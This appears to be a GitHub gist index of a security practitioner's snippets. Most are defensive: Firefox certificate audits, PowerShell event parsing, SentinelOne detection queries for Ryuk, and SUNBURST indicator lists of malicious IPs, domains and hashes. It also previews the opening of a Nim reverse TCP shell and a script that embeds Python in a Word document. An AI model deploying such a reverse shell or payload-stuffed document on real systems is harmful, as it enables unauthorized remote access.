Skip to content

Instantly share code, notes, and snippets.

View keyboardcrunch's full-sized avatar

keyboardcrunch keyboardcrunch

90 followers · 334 following
View GitHub Profile
@keyboardcrunch
keyboardcrunch / FFCertOverrideAudit.ps1
Created December 7, 2018 15:37
enumerate data from certificates overridden in firefox
$SkipFolders = ("Public", "Default")
$UserFolders = Get-ChildItem -Path "C:\Users\" -Exclude $SkipFolders
$CertData = @()
ForEach ($User in $UserFolders) {
$override = Get-ChildItem -Path "$($User)\AppData\Roaming\Mozilla\Firefox\Profiles" -Recurse -Filter cert_override.txt -Force -ErrorAction SilentlyContinue
Foreach ($ofile in $override) {
$Certs = Get-Content $ofile.FullName | Select-Object -skip 2
Foreach ($line in $Certs) {
# # https://developer.mozilla.org/en-US/docs/Archive/Misc_top_level/Cert_override.txt
$data = $line -split '\s+' # split line by whitespace
@keyboardcrunch
keyboardcrunch / ChromeExtensionDownload.py
Created March 10, 2019 02:54
repurposed chrome extension download and extraction script
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Python Script to download the Chrome Extensions (CRX) file directly from the google chrome web store.
Referred from http://chrome-extension-downloader.com/how-does-it-work.php
"""
import argparse
@keyboardcrunch
keyboardcrunch / EventParser.ps1
Created October 4, 2019 21:45 — forked from medmondson44/EventParser.ps1
This PowerShell script is used to parse Windows events.
Function Get-PowerShellLog {
<#
.SYNOPSIS
Get-PowerShellLog extracts all PowerShell ScriptBlock Events [Evt 4104] from the Microsoft-Windows-PowerShell/Operational Event log for a specified timeframe
.DESCRIPTION
Query the event log and pull back all PowerShell ScriptBlock Events.
Event 4104
Query and filter
.PARAMETER
Switch to pull back PowerShell ScriptBlock Log back a desired number of minutes
@keyboardcrunch
keyboardcrunch / revshell.nim
Created December 12, 2019 01:19
Reverse TCP shell in Nim-Lang; with rejoin/retry connections
import net, os, osproc
while true:
try:
var client: Socket = newSocket()
client.connect("127.0.0.1", Port(5858))
stdout.writeLine("Connected to server.")
while true:
let message: string = client.recvLine()
@keyboardcrunch
keyboardcrunch / unhide.py
Created April 3, 2020 02:25
Excel workbook unhider.
#!/usr/bin/python3
"""
./oledump.py -p plugin_biff --pluginoptions "-o bound -a" sample.xls
1: 4096 '\x05DocumentSummaryInformation'
2: 236 '\x05SummaryInformation'
3: 104629 'Workbook'
Plugin: BIFF plugin
0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible
' 00000000: CA D9 00 00 00 00 06 00 \xca\xd9......'
@keyboardcrunch
keyboardcrunch / pydocexec.py
Created April 30, 2020 02:24
Injects a python script inside a word document so the doc can be executed with python :)
#!/usr/bin/python3
import sys
import os
import zipfile
import tempfile
from xml.etree import ElementTree
from shutil import copyfile
def stuffer(py_file, doc_file):
@keyboardcrunch
keyboardcrunch / config.yml
Created August 30, 2020 21:42
wtfutil configuration
wtf:
colors:
background: "black"
text: "white"
title: "red"
border:
focusable: grey
focused: grey
normal: grey
grid:
@keyboardcrunch
keyboardcrunch / dashboard.json
Created August 30, 2020 21:48
Customized SentinelOne Dashboard
[{"coordinates":{"cols":5,"rows":4,"x":0,"y":7},"data":{"api":"incidentStatuses","category":"Threats","chartType":"horizontalBar","filter":null,"filterColor":"#272727","refreshInterval":120,"scope":null,"textSettings":null,"timeRange":{"from":null,"timeString":"Last 30 Days","to":null,"type":"set"},"title":"Incident Status"},"id":"22"},{"coordinates":{"cols":5,"rows":4,"x":11,"y":3},"data":{"api":"classifications","category":"Threats","chartType":"doughnut","filter":null,"filterColor":"#272727","refreshInterval":120,"scope":{},"textSettings":null,"timeRange":{"from":null,"timeString":"Last 30 Days","to":null,"type":"set"},"title":"Threats by Type"},"id":"23"},{"coordinates":{"cols":6,"rows":4,"x":10,"y":7},"data":{"api":"threatSummary","category":"Threats","chartType":"line","refreshInterval":120,"scope":null,"textSettings":null,"timeRange":null,"title":"Threat Aging - Last 7 Days"},"id":"24"},{"coordinates":{"cols":5,"rows":4,"x":5,"y":12},"data":{"api":"machineTypes","category":"Endpoints","chartType":"bar"
@keyboardcrunch
keyboardcrunch / Detecting Ryuk with SentinelOne.md
Last active November 6, 2020 20:01

A few days back Red Canary dropped a blog post titled A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak that highlighted 10 detection opportunities for stopping the most recent Bazar/Ryuk ransomware infections. Below are the 10 SentinelOne Deep Visibility queries I've come up with for detecting the techniques.

1. Process hollowing of cmd.exe

T1055.012 Hollowing of cmd.exe

SrcProcParentName = "cmd.exe" AND SrcProcName In Anycase ("svchost.exe","explorer.exe","nltest.exe","net.exe") AND DstPort In ("443","53")

2. Enumerating domain trusts activity with nltest.exe

T1482 Domain Trust Discovery

@keyboardcrunch
keyboardcrunch / fireeye_sunburn_iocs.txt
Last active December 14, 2020 05:23
SentinelOne DV Query for FireEye's Sunburt IOCs
DstIp In ("13.59.205.66","54.193.127.66","54.215.192.52","34.203.203.23","139.99.115.204","5.252.177.25","5.252.177.21","204.188.205.176","51.89.125.18","167.114.213.199") OR DnsRequest In Contains ("avsvmcloud.com","freescanonline.com","deftsecurity.com","freescanonline.com","thedoccloud.com","websitetheme.com","highdatabase.com","incomeupdate.com","databasegalore.com","panhardware.com","zupertech.com") OR Sha256 In ("d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600","53f8dfc65169ccda021b72a62e0c22a4db7c4077f002fa742717d41b3c40f2c7","019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134","ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6","32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77","292327e5c94afa352cc5a02ca273df543f2020d0e76368ff96c84f4e90778712","c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71","dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b","eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed"